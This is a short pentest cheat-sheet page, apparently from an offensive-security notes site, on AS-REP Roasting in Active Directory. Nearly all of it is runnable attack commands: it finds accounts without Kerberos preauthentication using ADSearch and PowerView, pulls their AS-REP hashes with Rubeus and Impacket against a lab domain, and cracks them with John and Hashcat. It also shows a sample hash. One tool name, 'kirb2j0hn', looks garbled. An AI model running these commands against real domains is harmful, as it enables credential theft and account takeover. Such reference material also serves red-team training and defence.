ASREPRoasting

Discovery ASREP account

# ADSearch
ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname

# PowerView
Get-DomainUser -PreauthNotRequired

Rubeus

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:svc /nowrap

Impacket

└─$ impacket-GetNPUsers vulnableone.local/app-svc -dc-ip 10.10.10.10 -no-pass
└─$ impacket-GetNPUsers -no-pass -usersfile svc.txt -dc-ip 10.10.10.10 'vulnableone.local/'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

$krb5asrep$23$svc-admin@VULNABLEONE.LOCAL:abe0d0e1b34713c079bfcada6483eaf6...

Crack Hash

John

$ kirb2j0hn ticket.kirbi > crackfile
john --format=krb5asrep --wordlist=wordlist svc-admin

$ john --format=krb5asrep --wordlist=wordlist svc-admin

Hashcat

hashcat -a 0 -m 18200 svc-admin wordlist

PreviousKerberoasting NextUnconstrained Delegation

Last updated 1 year ago